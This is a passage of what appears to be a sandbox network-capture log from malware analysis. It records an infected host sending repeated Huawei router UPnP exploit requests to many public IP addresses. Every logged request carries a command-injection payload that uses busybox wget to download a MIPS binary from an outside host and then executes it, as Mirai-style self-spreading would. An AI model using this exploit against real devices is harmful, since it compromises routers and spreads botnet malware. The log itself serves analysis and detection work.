2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1612192.168.2.155192241.24.253.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.883668900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1613192.168.2.1543620197.120.248.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.883696079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1614192.168.2.1535754197.43.176.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.888758898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1615192.168.2.1557882157.132.155.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.918721914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1616192.168.2.1550928197.7.22.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.918859959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1617192.168.2.155275841.223.79.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.918879986 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1618192.168.2.1552124184.116.184.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.888670921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1619192.168.2.1551420157.152.100.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.888972044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1620192.168.2.1547508157.154.54.037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.889015913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1621192.168.2.1560248197.102.179.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.900377989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1622192.168.2.1557358140.205.1.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.900408983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
